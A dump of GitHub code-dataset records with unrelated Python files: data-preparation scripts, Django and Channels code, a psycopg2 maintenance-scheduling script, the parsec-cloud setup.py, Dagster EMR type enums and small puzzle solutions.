CoNLL-U file with the given columns.\"\"\"\n )\n arg_parser.add_argument(\n \"-m\",\n \"--mode\",\n dest=\"mode\",\n choices=['tagger', 'parser'],\n required=True,\n help=\"\"\"Specify mode as described above. Choose one of the following: {tagger, parser}.\"\"\",\n )\n arg_parser.add_argument(\n \"-p\",\n \"--prediction\",\n metavar=\"PRED_FILE\",\n dest=\"pred_file\",\n required=True,\n help=\"\"\"Prediction file in json format. Output of AllenNLP tagger or parser.\"\"\",\n )\n arg_parser.add_argument(\n \"-o\",\n \"--output_file\",\n dest=\"out\",\n metavar=\"OUTPUT_FILE\",\n help=\"\"\"Path of the output file. Default is .conllu if not specified\"\"\",\n )\n arg_parser.add_argument(\n \"--multi\",\n dest=\"multi_mode\",\n const=True,\n default=False,\n action=\"store_const\",\n help=\"\"\"When specified, read multiple recipes in one document.\"\"\",\n )\n args = arg_parser.parse_args()\n\n args.debug = False\n\n # default output file name\n if args.out == None:\n args.out = str(args.pred_file)[:-4] + \"conllu\"\n\n #########################\n #### Start execution ####\n #########################\n\n if args.mode == \"tagger\":\n execute_tagger2c(args)\n elif args.mode == \"parser\":\n execute_parse2c(args)\n else:\n raise RuntimeError(\n \"Unexpected mode. Valid options are {tagger, parser}.\"\n )\n","repo_name":"interactive-cookbook/tagger-parser","sub_path":"data-scripts/json_to_conll.py","file_name":"json_to_conll.py","file_ext":"py","file_size_in_byte":11277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32791402665","text":"import pandas as pd \nimport glob\nimport random\nimport yaml\nimport os\nimport json\ndef create_dataset_csv(path_construct):\n path_list = { \"frames\": [], \"patient\": [], \"acquisition\": [],\"images_path\": [], \"annotations_path\": [], \"angio_loader_header\": []}\n # frame_list={\"frames\"}\n\n for patient in path_construct:\n #print (image)\n # x=os.path.join(image,r\"*\")\n\n x = glob.glob(os.path.join(patient, r\"*\"))\n # print (x)\n for acquisiton in x:\n img = os.path.join(acquisiton, \"frame_extractor_frames.npz\")\n annotations = os.path.join(acquisiton, \"clipping_points.json\")\n angio_leader = os.path.join(acquisiton, \"angio_loader_header.json\")\n with open(annotations) as f:\n clipping_points = json.load(f)\n\n for frame in clipping_points:\n frame_int = int(frame)\n\n path_list['images_path'].append(img)\n path_list['annotations_path'].append(annotations)\n path_list['frames'].append(frame_int)\n path_list['patient'].append(os.path.basename(patient))\n path_list['acquisition'].append(os.path.basename(acquisiton))\n path_list['angio_loader_header'].append(angio_leader)\n\n return path_list\n\ndef split_dataset(dataset_df, split_per, seed=1):\n \"\"\"Impartirea setului de date in antrenare, validare si testare in mod aleatoriu\n\n Args:\n dataset_df (pandas.DataFrame): contine caile catre imaginile de input si mastile de segmentare\n split_per (dict): un dictionare de forma {\"train\": float, \"valid\": float, \"test\": float} ce descrie\n procentajele pentru fiecare subset\n seed (int, optional): valoarea seed pentru reproducerea impartirii setului de date. Defaults to 1.\n \"\"\"\n # se amesteca aleatoriu indecsii DataFrame-ului\n # indexul este un numar (de cele mai multe ori) asociat fiecarui rand\n\n patients = dataset_df['patient'].unique()\n\n total = len(patients)\n\n random.seed(seed)\n random.shuffle(patients)\n\n # se impart indecsii in functie de procentele primite ca input\n train_idx = int(total * split_per[\"train\"])\n valid_idx = train_idx + int(total * split_per[\"valid\"])\n test_idx = train_idx + valid_idx + int(total * split_per[\"test\"])\n\n train_patients = patients[:train_idx]\n valid_patients = patients[train_idx:valid_idx]\n test_patients = patients[valid_idx:test_idx]\n\n dataset_df['subset'] = \"\"\n\n dataset_df.loc[dataset_df['patient'].isin(\n train_patients), 'subset'] = 'train'\n dataset_df.loc[dataset_df['patient'].isin(\n valid_patients), 'subset'] = 'valid'\n dataset_df.loc[dataset_df['patient'].isin(\n test_patients), 'subset'] = 'test'\n\n return dataset_df\n\n\n\ndef main ():\n \n # config = None\n # with open('config.yaml') as f: # reads .yml/.yaml files\n # config = yaml.safe_load(f)\n \n # path_construct = glob.glob(r'/media/cuda/HDD 1TB - DATE/AvesalonRazvanDate , Experimente/pacienti_11jan/*')\n \n # path_list = create_dataset_csv(path_construct)\n # dataset_df_pacienti_noi= pd.DataFrame(path_list)\n\n # dataset_df= split_dataset(dataset_df_pacienti_noi, split_per=config['data']['split_per'], seed=1)\n # print(dataset_df.head(3))\n # dataset_df.to_csv(config['data']['dataset_csv']) \n df1=pd.read_csv(r\"D:\\ai intro\\Angiografii\\PROIECT_ANGIOGRAFII\\CSV_angiografii_11.05.csv\")\n df2=pd.read_csv(r\"D:\\ai intro\\Angiografii\\PROIECT_ANGIOGRAFII\\CSV_angiografii_19.01.csv\")\n \n subset=df1.pop('subset')\n print (list(df1.columns))\n df1.insert(4,'subset',subset)\n\n \n \n result=df2.append(df1,ignore_index=True)\n \n result.pop('Unnamed: 0')\n \n \n result.to_csv(r\"D:\\ai intro\\Angiografii\\PROIECT_ANGIOGRAFII\\CSV_angiografii_date_adaugate.csv\")\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"RazvanAVESALON/PROIECT_ANGIOGRAFII","sub_path":"utils/csv_date_noi_generare.py","file_name":"csv_date_noi_generare.py","file_ext":"py","file_size_in_byte":3874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24296780784","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('userinfo', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='studentinfo',\n name='leschool',\n field=models.BooleanField(verbose_name='休学', default=False),\n ),\n ]\n","repo_name":"haominqu/pythoncrm","sub_path":"pythoncrm/userinfo/migrations/0002_studentinfo_leschool.py","file_name":"0002_studentinfo_leschool.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74984499047","text":"from PIL import Image\n\n#Objective:\n# Place image on screen and rapidly flip it so it appears \n# to be slashing a target.\n# Concatenate the second gif to the end of the image.\n#\n\noutput = []\n\n\nwith Image.open(\"georgesuo.png\") as img:\n\tfor x in range(5):\n\t\t#\n\t\tdelay = x*20\n\n\n\n\n\n\n\n\n\noutput[0].save('diesofgeorge.gif', save_all=True, append_images=output[1:], loop=0, disposal=2)","repo_name":"charredgrass/image-manip","sub_path":"diesofgeorge.py","file_name":"diesofgeorge.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6625097366","text":"import psycopg2\nimport pandas as pd\n# Connect to the PostgreSQL database\ntry:\n conn = psycopg2.connect(\n host=\"localhost\",\n database=\"IoTDataLake\",\n user=\"postgres\",\n password=\"\"\n )\nexcept Exception as e:\n print(\"Unable to connect to the database\")\n print(e)\n\n# Query the wind turbine data from the curated zone of the data lake\ntry:\n cur = conn.cursor()\n cur.execute(\"SELECT * FROM curatedzone.c_external_wind_turbine_data\")\n wind_turbine_data = pd.DataFrame(cur.fetchall(), columns=['id', 'rtc', 'year', 'month', 'day', 'hour', 'minute',\n 'temperature_100', 'temperature_120', 'temperature_80',\n 'wind_direction_100', 'wind_direction_120',\n 'wind_direction_80', 'wind_speed_100','wind_speed_120',\n 'wind_speed_80','pressure_200','pressure_100','pressure_0',\n 'power_output_80','power_output_100','power_output_120'])\n cur.close()\nexcept Exception as e:\n print(\"Unable to fetch wind turbine data\")\n print(e)\n\n# Define the threshold for power output\nthreshold = 2000\n\n# Calculate the moving average of the power output\nrolling_avg = wind_turbine_data['power_output_100'].rolling(window=24).mean()\n\n# Identify the time periods when the power output is below the threshold and the rolling average\nlow_power_periods = wind_turbine_data.loc[(wind_turbine_data['power_output_100'] < threshold) & (wind_turbine_data['power_output_100'] < rolling_avg)]\n\n# Calculate the duration of each low-power period\nlow_power_periods['Duration'] = (low_power_periods['rtc'] - low_power_periods['rtc'].shift())\n\n# Identify the time periods when maintenance should be performed\nmaintenance_periods = low_power_periods.loc[low_power_periods['Duration'] > pd.Timedelta('1 day')]\n\n# Compute the start and end times of the maintenance period\nmaint_start = maintenance_periods['rtc'].min()\nmaint_end = maintenance_periods['rtc'].min() + pd.Timedelta('6 hours')\n\n# Create a single maintenance record\nmaintenance_record = pd.DataFrame({\n 'maint_actual_start': [maint_start],\n 'maint_actual_end': [maint_end],\n 'maint_schedule_start': [maint_start + pd.Timedelta('1 day')],\n 'maint_schedule_end': [maint_end + pd.Timedelta('1 day')],\n 'reason': ['Preventive Maintenance'],\n 'vendor': ['ABC Company'],\n 'description': ['Inspect and clean the turbine blades'],\n 'assignee': ['John Doe'],\n 'status': ['Scheduled'],\n 'equipment_location': ['Turbine 1'],\n 'priority': ['High']\n})\n\n# Insert the maintenance record into the maintenance table\ntry:\n cur = conn.cursor()\n cur.execute(\"INSERT INTO maintenancezone.maintanence_rec (maint_schedule_start, maint_schedule_end, reason, vendor, description, assignee, status, equipment_location, priority) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s)\",\n (maintenance_record['maint_schedule_start'][0], maintenance_record['maint_schedule_end'][0], maintenance_record['reason'][0], maintenance_record['vendor'][0], maintenance_record['description'][0], maintenance_record['assignee'][0], maintenance_record['status'][0], maintenance_record['equipment_location'][0], maintenance_record['priority'][0]))\n # Commit\n conn.commit()\n print(\"Maintenance record inserted successfully\")\nexcept:\n print(\"Unable to insert maintenance record\")\nfinally:\n # Close the cursor and connection\n cur.close()\n conn.close()\n","repo_name":"bpbpublications/IoT-Data-Analytics-using-Python","sub_path":"Chapter 08/code/901_8.6.py","file_name":"901_8.6.py","file_ext":"py","file_size_in_byte":3634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17871368778","text":"from django.shortcuts import render\nfrom ipn.models.Message import Message\nfrom ipn.models.Lvc_Preliminary import Lvc_Preliminary\n\ndef get_message(request, id):\n message = Message.objects.get(id=id)\n related_lvc_data = Lvc_Preliminary.objects.filter(message_id=id).values()[0]\n\n context = {\n \"message\": message,\n \"lvc_data\": related_lvc_data\n }\n return render(request, \"message_detail.html\", context)\n\ndef get_messages(request):\n messages = Message.objects.all()\n context = {\n \"messages\": messages\n }\n return render(request, \"messages_index.html\", context)\n","repo_name":"lpsinger/interplanetary_network","sub_path":"ipn/views/messages.py","file_name":"messages.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73810284329","text":"import os\n\nfrom setuptools import setup, find_packages, distutils, Command\nfrom setuptools.command.build_py import build_py\n\n\n# Awesome hack to load `__version__`\n__version__ = None\nexec(open(\"parsec/_version.py\", encoding=\"utf-8\").read())\n\n\ndef fix_pyqt_import():\n # PyQt5-sip is a distinct pip package that provides PyQt5.sip\n # However it setuptools handles `setup_requires` by downloading the\n # dependencies in the `./.eggs` directory without really installing\n # them. This causes `import PyQt5.sip` to fail given the `PyQt5` folder\n # doesn't contains `sip.so` (or `sip.pyd` on windows)...\n import sys\n import glob\n import importlib\n\n for module_name, path_glob in (\n (\"PyQt5\", \".eggs/*PyQt5*/PyQt5/__init__.py\"),\n (\"PyQt5.sip\", \".eggs/*PyQt5_sip*/PyQt5/sip.*\"),\n ):\n # If the module has already been installed in the environment\n # setuptools won't populate the `.eggs` directory and we have\n # nothing to do\n try:\n importlib.import_module(module_name)\n except ImportError:\n pass\n else:\n continue\n\n for path in glob.glob(path_glob):\n\n spec = importlib.util.spec_from_file_location(module_name, path)\n if spec:\n module = importlib.util.module_from_spec(spec)\n sys.modules[module_name] = module\n break\n\n else:\n raise RuntimeError(\"Cannot found module `%s` in .eggs\" % module_name)\n\n\nclass GeneratePyQtResourcesBundle(Command):\n description = \"Generates `parsec.core.gui._resource_rc` bundle module\"\n\n user_options = []\n\n def initialize_options(self):\n pass\n\n def finalize_options(self):\n pass\n\n def run(self):\n fix_pyqt_import()\n try:\n from PyQt5.pyrcc_main import processResourceFile\n\n self.announce(\"Generating `parsec.core.gui._resources_rc`\", level=distutils.log.INFO)\n processResourceFile(\n [\"parsec/core/gui/rc/resources.qrc\"], \"parsec/core/gui/_resources_rc.py\", False\n )\n except ImportError:\n print(\"PyQt5 not installed, skipping `parsec.core.gui._resources_rc` generation.\")\n\n\nclass GenerateChangelog(Command):\n description = \"Convert HISTORY.rst to HTML\"\n\n user_options = []\n\n def initialize_options(self):\n pass\n\n def finalize_options(self):\n pass\n\n def run(self):\n import docutils.core\n\n destination_folder = \"parsec/core/gui/rc/generated_misc\"\n self.announce(\n f\"Converting HISTORY.rst to {destination_folder}/history.html\", level=distutils.log.INFO\n )\n os.makedirs(destination_folder, exist_ok=True)\n docutils.core.publish_file(\n source_path=\"HISTORY.rst\",\n destination_path=f\"{destination_folder}/history.html\",\n writer_name=\"html\",\n )\n\n\nclass GeneratePyQtForms(Command):\n description = \"Generates `parsec.core.ui.*` forms module\"\n\n user_options = []\n\n def initialize_options(self):\n pass\n\n def finalize_options(self):\n pass\n\n def run(self):\n import os\n import pathlib\n from collections import namedtuple\n\n fix_pyqt_import()\n try:\n from PyQt5.uic.driver import Driver\n except ImportError:\n print(\"PyQt5 not installed, skipping `parsec.core.gui.ui` generation.\")\n return\n\n self.announce(\"Generating `parsec.core.gui.ui`\", level=distutils.log.INFO)\n Options = namedtuple(\n \"Options\",\n [\"output\", \"import_from\", \"debug\", \"preview\", \"execute\", \"indent\", \"resource_suffix\"],\n )\n ui_dir = pathlib.Path(\"parsec/core/gui/forms\")\n ui_path = \"parsec/core/gui/ui\"\n os.makedirs(ui_path, exist_ok=True)\n for f in ui_dir.iterdir():\n o = Options(\n output=os.path.join(ui_path, \"{}.py\".format(f.stem)),\n import_from=\"parsec.core.gui\",\n debug=False,\n preview=False,\n execute=False,\n indent=4,\n resource_suffix=\"_rc\",\n )\n d = Driver(o, str(f))\n d.invoke()\n\n\nclass ExtractTranslations(Command):\n description = \"Extract translation strings\"\n\n user_options = []\n\n def initialize_options(self):\n pass\n\n def finalize_options(self):\n pass\n\n def run(self):\n import os\n import pathlib\n from unittest.mock import patch\n from babel.messages.frontend import CommandLineInterface\n\n fix_pyqt_import()\n try:\n from PyQt5.pylupdate_main import main as pylupdate_main\n except ImportError:\n print(\"PyQt5 not installed, skipping `parsec.core.gui.ui` generation.\")\n return\n\n self.announce(\"Generating ui translation files\", level=distutils.log.INFO)\n ui_dir = pathlib.Path(\"parsec/core/gui\")\n tr_dir = ui_dir / \"tr\"\n os.makedirs(tr_dir, exist_ok=True)\n\n new_args = [\"pylupdate\", str(ui_dir / \"parsec-gui.pro\")]\n with patch(\"sys.argv\", new_args):\n pylupdate_main()\n\n files = [str(f) for f in ui_dir.iterdir() if f.is_file() and f.suffix == \".py\"]\n files.sort()\n files.append(str(tr_dir / \"parsec_en.ts\"))\n args = [\n \"_\",\n \"extract\",\n \"-k\",\n \"translate\",\n \"-s\",\n \"--no-location\",\n \"-F\",\n \".babel.cfg\",\n \"--omit-header\",\n \"-o\",\n str(tr_dir / \"translation.pot\"),\n *files,\n ]\n CommandLineInterface().run(args)\n languages = [\"fr\", \"en\"]\n for lang in languages:\n po_file = tr_dir / f\"parsec_{lang}.po\"\n if not po_file.is_file():\n po_file.touch()\n args = [\n \"_\",\n \"update\",\n \"-i\",\n str(tr_dir / \"translation.pot\"),\n \"-o\",\n str(po_file),\n \"-l\",\n lang,\n ]\n CommandLineInterface().run(args)\n\n\nclass CompileTranslations(Command):\n description = \"Compile translations\"\n\n user_options = []\n\n def initialize_options(self):\n pass\n\n def finalize_options(self):\n pass\n\n def run(self):\n import os\n import pathlib\n from babel.messages.frontend import CommandLineInterface\n\n self.announce(\"Compiling ui translation files\", level=distutils.log.INFO)\n ui_dir = pathlib.Path(\"parsec/core/gui\")\n tr_dir = ui_dir / \"tr\"\n rc_dir = ui_dir / \"rc\" / \"translations\"\n os.makedirs(rc_dir, exist_ok=True)\n languages = [\"fr\", \"en\"]\n for lang in languages:\n args = [\n \"_\",\n \"compile\",\n \"-i\",\n str(tr_dir / f\"parsec_{lang}.po\"),\n \"-o\",\n str(rc_dir / f\"parsec_{lang}.mo\"),\n ]\n CommandLineInterface().run(args)\n\n\nclass build_py_with_pyqt(build_py):\n def run(self):\n self.run_command(\"generate_pyqt_forms\")\n self.run_command(\"compile_translations\")\n self.run_command(\"generate_changelog\")\n self.run_command(\"generate_pyqt_resources_bundle\")\n return super().run()\n\n\nclass build_py_with_pyqt_resource_bundle_generation(build_py):\n def run(self):\n self.run_command(\"generate_pyqt_resources_bundle\")\n return super().run()\n\n\nwith open(\"README.rst\") as readme_file:\n readme = readme_file.read()\n\nwith open(\"HISTORY.rst\") as history_file:\n history = history_file.read()\n\n\nrequirements = [\n \"attrs==19.2.0\",\n \"click==7.0\",\n \"msgpack==0.6.0\",\n \"wsproto==0.15.0\",\n \"h11==0.10.0\",\n # Can use marshmallow or the toasted flavour as you like ;-)\n # \"marshmallow==2.14.0\",\n \"toastedmarshmallow==0.2.6\",\n \"pendulum==2.1.2\",\n \"PyNaCl==1.4.0\",\n \"trio==0.16.0\",\n \"trio_typing==0.5.0\",\n \"async_generator>=1.9\",\n 'contextvars==2.1;python_version<\"3.7\"',\n \"sentry-sdk==0.14.3\",\n \"structlog==19.2.0\",\n \"importlib_resources==1.0.2\",\n \"colorama==0.4.0\", # structlog colored output\n \"async_exit_stack==1.0.1\",\n \"outcome==1.0.0\",\n \"packaging==20.4\",\n]\n\n\ntest_requirements = [\n \"pytest==5.4.3\",\n \"pytest-cov==2.10.0\",\n \"pytest-xdist==1.32.0\",\n \"pytest-trio==0.5.2\",\n \"pytest-qt==3.3.0\",\n \"pytest-rerunfailures==9.0\",\n \"hypothesis==5.3.0\",\n \"hypothesis-trio==0.5.0\",\n \"trustme==0.6.0\",\n # Winfsptest requirements\n # We can't use `winfspy[test]` because of some pip limitations\n # - see pip issues #7096/#6239/#4391/#988\n # Looking forward to the new pip dependency resolver!\n 'pywin32==227;platform_system==\"Windows\"',\n # Fix botocore and sphinx conflicting requirements on docutils\n \"docutils>=0.12,<0.16\",\n # Documentation generation requirements\n \"sphinx==2.4.3\",\n \"sphinx-intl==2.0.0\",\n \"sphinx-rtd-theme==0.4.3\",\n \"psutil==5.7.3\",\n]\n\n\nPYQT_DEPS = [\"PyQt5==5.14.2\", \"pyqt5-sip==12.8.0\"]\nBABEL_DEP = \"Babel==2.6.0\"\nWHEEL_DEP = \"wheel==0.34.2\"\nDOCUTILS_DEP = \"docutils==0.15\"\nextra_requirements = {\n \"core\": [\n *PYQT_DEPS,\n BABEL_DEP,\n 'fusepy==3.0.1;platform_system==\"Linux\" or platform_system==\"Darwin\"',\n 'winfspy==0.8.0;platform_system==\"Windows\"',\n \"zxcvbn==4.4.27\",\n 'psutil==5.7.3;platform_system==\"Windows\"',\n ],\n \"backend\": [\n \"jinja2==2.11.2\",\n # PostgreSQL\n \"triopg==0.6.0\",\n \"trio-asyncio==0.11.0\",\n # S3\n \"boto3==1.12.34\",\n \"botocore==1.15.34\",\n # Swift\n \"python-swiftclient==3.5.0\",\n \"pbr==4.0.2\",\n ],\n \"dev\": test_requirements,\n}\nextra_requirements[\"all\"] = sum(extra_requirements.values(), [])\nextra_requirements[\"oeuf-jambon-fromage\"] = extra_requirements[\"all\"]\n\nsetup(\n name=\"parsec-cloud\",\n version=__version__,\n description=\"Secure cloud framework\",\n long_description=readme + \"\\n\\n\" + history,\n author=\"Scille SAS\",\n author_email=\"contact@scille.fr\",\n url=\"https://github.com/Scille/parsec-cloud\",\n python_requires=\"~=3.6\",\n packages=find_packages(include=[\"parsec\", \"parsec.*\"]),\n package_dir={\"parsec\": \"parsec\"},\n setup_requires=[WHEEL_DEP, *PYQT_DEPS, BABEL_DEP, DOCUTILS_DEP], # To generate resources bundle\n install_requires=requirements,\n extras_require=extra_requirements,\n cmdclass={\n \"generate_pyqt_resources_bundle\": GeneratePyQtResourcesBundle,\n \"generate_changelog\": GenerateChangelog,\n \"generate_pyqt_forms\": GeneratePyQtForms,\n \"extract_translations\": ExtractTranslations,\n \"compile_translations\": CompileTranslations,\n \"generate_pyqt\": build_py_with_pyqt,\n \"build_py\": build_py_with_pyqt,\n },\n # Omitting GUI resources given they end up packaged in `parsec/core/gui/_resources_rc.py`\n package_data={\n \"parsec.backend.postgresql.migrations\": [\"*.sql\"],\n \"parsec.backend.templates\": [\"*\"],\n \"parsec.backend.static\": [\"*\"],\n \"parsec.core.resources\": [\"*.ico\", \"*.icns\", \"*.ignore\"],\n },\n entry_points={\n \"console_scripts\": [\"parsec = parsec.cli:cli\"],\n \"babel.extractors\": [\"extract_qt = misc.babel_qt_extractor.extract_qt\"],\n },\n license=\"AGPLv3\",\n zip_safe=False,\n keywords=\"parsec\",\n classifiers=[\n \"Development Status :: 5 - Production/Stable\",\n \"Intended Audience :: Developers\",\n \"Operating System :: POSIX :: Linux\",\n \"Operating System :: Microsoft :: Windows\",\n \"Operating System :: MacOS\",\n \"License :: OSI Approved :: GNU Affero General Public License v3 or later (AGPLv3+)\",\n \"Natural Language :: English\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n ],\n test_suite=\"tests\",\n tests_require=test_requirements,\n long_description_content_type=\"text/x-rst\",\n)\n","repo_name":"groumage/Parsec-TowardAMoreSecureCloud","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":12103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17711050152","text":"from channels.consumer import AsyncConsumer, StopConsumer\nfrom django.db import connection\n\n# from channels.generic.websocket import AsyncWebsocketConsumer\n\n\nclass ChatHotelConsumer(AsyncConsumer):\n\n async def websocket_connect(self, message):\n current_user = self.scope['user']\n\n currrent_tenant = self.scope['tenant'] #request.tenant\n \n print(current_user, \"websocket_connect current_user\")\n print(message, \"websocket_connect message\")\n\n print(currrent_tenant, \"currrent_tenant\")\n\n print(connection.schema_name, \"connection.schema_name\")\n\n await self.send({\"type\": \"websocket.accept\"})\n\n\n\n async def websocket_receive(self, message):\n \"\"\"\n Called when a WebSocket frame is received. Decodes it and passes it\n to receive().\n \"\"\"\n if \"text\" in message:\n await self.receive(text_data=message[\"text\"])\n else:\n await self.receive(bytes_data=message[\"bytes\"])\n\n async def receive(self, text_data=None, bytes_data=None):\n \"\"\"\n Called with a decoded WebSocket frame.\n \"\"\"\n if text_data:\n print(\"received text_data\", text_data)\n \n elif bytes_data:\n print(\"bytes_data received\", bytes_data)\n\n\n async def websocket_disconnect(self, message):\n\n print(\"websocket_disconnect\", message)\n raise StopConsumer()\n","repo_name":"Ngahu/dj_channels_x_dj_tenants","sub_path":"apps/tenant_apps/hotels/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34964632035","text":"import urllib.request\n\nwith open('input.txt') as file:\n input_array = [list(line.strip()) for line in file]\n gamma_rate = \"\"\n epsilon_rate = \"\"\n num_one = [0 for i in range(0, len(input_array[0]))]\n\n for i in range(0, len(input_array)):\n for j in range(0, len(input_array[i])):\n if int(input_array[i][j]) == 1:\n num_one[j] += 1\n else:\n num_one[j] -= 1\n\n for j in range(0, len(input_array[0])):\n if int(num_one[j]) >= 1:\n gamma_rate = gamma_rate + \"1\"\n epsilon_rate = epsilon_rate + \"0\"\n else:\n gamma_rate = gamma_rate + \"0\"\n epsilon_rate = epsilon_rate + \"1\"\n\ngamma_decimal = int(gamma_rate, 2)\nepsilon_decimal = int(epsilon_rate, 2)\n\nprint(gamma_decimal * epsilon_decimal)\n\n\n\n","repo_name":"zaragomes/AdventOfCode2021","sub_path":"day03/aoc3.1.py","file_name":"aoc3.1.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9891540157","text":"from enum import Enum as PyEnum\n\nfrom dagster import Enum, EnumValue\n\nEbsVolumeType = Enum(\n name=\"EbsVolumeType\", enum_values=[EnumValue(\"gp2\"), EnumValue(\"io1\"), EnumValue(\"standard\")]\n)\n\n\nclass EmrClusterState(PyEnum):\n \"\"\"Cluster state for EMR.\"\"\"\n\n Starting = \"STARTING\"\n Bootstrapping = \"BOOTSTRAPPING\"\n Running = \"RUNNING\"\n Waiting = \"WAITING\"\n Terminating = \"TERMINATING\"\n Terminated = \"TERMINATED\"\n TerminatedWithErrors = \"TERMINATED_WITH_ERRORS\"\n\n\nEMR_CLUSTER_TERMINATED_STATES = [\n EmrClusterState.Terminating,\n EmrClusterState.Terminated,\n EmrClusterState.TerminatedWithErrors,\n]\n\nEMR_CLUSTER_DONE_STATES = EMR_CLUSTER_TERMINATED_STATES + [EmrClusterState.Waiting]\n\n\nclass EmrStepState(PyEnum):\n \"\"\"Step state for EMR.\"\"\"\n\n Pending = \"PENDING\"\n Running = \"RUNNING\"\n Continue = \"CONTINUE\"\n Completed = \"COMPLETED\"\n Cancelled = \"CANCELLED\"\n Failed = \"FAILED\"\n Interrupted = \"INTERRUPTED\"\n\n\nEmrActionOnFailure = Enum(\n name=\"EmrActionOnFailure\",\n enum_values=[\n EnumValue(\"TERMINATE_JOB_FLOW\"),\n EnumValue(\"TERMINATE_CLUSTER\"),\n EnumValue(\"CANCEL_AND_WAIT\"),\n EnumValue(\"CONTINUE\"),\n ],\n)\n\nEmrAdjustmentType = Enum(\n name=\"EmrAdjustmentType\",\n enum_values=[\n EnumValue(\"CHANGE_IN_CAPACITY\"),\n EnumValue(\"PERCENT_CHANGE_IN_CAPACITY\"),\n EnumValue(\"EXACT_CAPACITY\"),\n ],\n)\n\nEmrComparisonOperator = Enum(\n name=\"EmrComparisonOperator\",\n enum_values=[\n EnumValue(\"GREATER_THAN_OR_EQUAL\"),\n EnumValue(\"GREATER_THAN\"),\n EnumValue(\"LESS_THAN\"),\n EnumValue(\"LESS_THAN_OR_EQUAL\"),\n ],\n)\n\nEmrInstanceRole = Enum(\n name=\"EmrInstanceRole\", enum_values=[EnumValue(\"MASTER\"), EnumValue(\"CORE\"), EnumValue(\"TASK\")]\n)\n\nEmrMarket = Enum(name=\"EmrMarket\", enum_values=[EnumValue(\"ON_DEMAND\"), EnumValue(\"SPOT\")])\n\nEmrRepoUpgradeOnBoot = Enum(\n name=\"EmrRepoUpgradeOnBoot\", enum_values=[EnumValue(\"SECURITY\"), EnumValue(\"NONE\")]\n)\n\nEmrScaleDownBehavior = Enum(\n name=\"EmrScaleDownBehavior\",\n enum_values=[\n EnumValue(\"TERMINATE_AT_INSTANCE_HOUR\"),\n EnumValue(\"TERMINATE_AT_TASK_COMPLETION\"),\n ],\n)\n\nEmrStatistic = Enum(\n name=\"EmrStatistic\",\n enum_values=[\n EnumValue(\"SAMPLE_COUNT\"),\n EnumValue(\"AVERAGE\"),\n EnumValue(\"SUM\"),\n EnumValue(\"MINIMUM\"),\n EnumValue(\"MAXIMUM\"),\n ],\n)\n\nEmrSupportedProducts = Enum(\n name=\"EmrSupportedProducts\", enum_values=[EnumValue(\"mapr-m3\"), EnumValue(\"mapr-m5\")]\n)\n\nEmrTimeoutAction = Enum(\n name=\"EmrTimeoutAction\",\n enum_values=[EnumValue(\"SWITCH_TO_ON_DEMAND\"), EnumValue(\"TERMINATE_CLUSTER\")],\n)\n\nEmrUnit = Enum(\n name=\"EmrUnit\",\n enum_values=[\n EnumValue(\"NONE\"),\n EnumValue(\"SECONDS\"),\n EnumValue(\"MICRO_SECONDS\"),\n EnumValue(\"MILLI_SECONDS\"),\n EnumValue(\"BYTES\"),\n EnumValue(\"KILO_BYTES\"),\n EnumValue(\"MEGA_BYTES\"),\n EnumValue(\"GIGA_BYTES\"),\n EnumValue(\"TERA_BYTES\"),\n EnumValue(\"BITS\"),\n EnumValue(\"KILO_BITS\"),\n EnumValue(\"MEGA_BITS\"),\n EnumValue(\"GIGA_BITS\"),\n EnumValue(\"TERA_BITS\"),\n EnumValue(\"PERCENT\"),\n EnumValue(\"COUNT\"),\n EnumValue(\"BYTES_PER_SECOND\"),\n EnumValue(\"KILO_BYTES_PER_SECOND\"),\n EnumValue(\"MEGA_BYTES_PER_SECOND\"),\n EnumValue(\"GIGA_BYTES_PER_SECOND\"),\n EnumValue(\"TERA_BYTES_PER_SECOND\"),\n EnumValue(\"BITS_PER_SECOND\"),\n EnumValue(\"KILO_BITS_PER_SECOND\"),\n EnumValue(\"MEGA_BITS_PER_SECOND\"),\n EnumValue(\"GIGA_BITS_PER_SECOND\"),\n EnumValue(\"TERA_BITS_PER_SECOND\"),\n EnumValue(\"COUNT_PER_SECOND\"),\n ],\n)\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/libraries/dagster-aws/dagster_aws/emr/types.py","file_name":"types.py","file_ext":"py","file_size_in_byte":3698,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"72878976808","text":"# link : https://leetcode.com/problems/move-zeroes\n# author : Mohamed Ibrahim\n\nclass Solution:\n def moveZeroes(self, nums: List[int]) -> None:\n \"\"\"\n Do not return anything, modify nums in-place instead.\n \"\"\"\n i = 0;cnt=0\n while i < len(nums):\n if nums[i] == 0:\n nums.pop(i)\n cnt+=1\n i-=1\n i+=1\n while cnt:\n nums.append(0)\n cnt-=1\n return nums\n \n 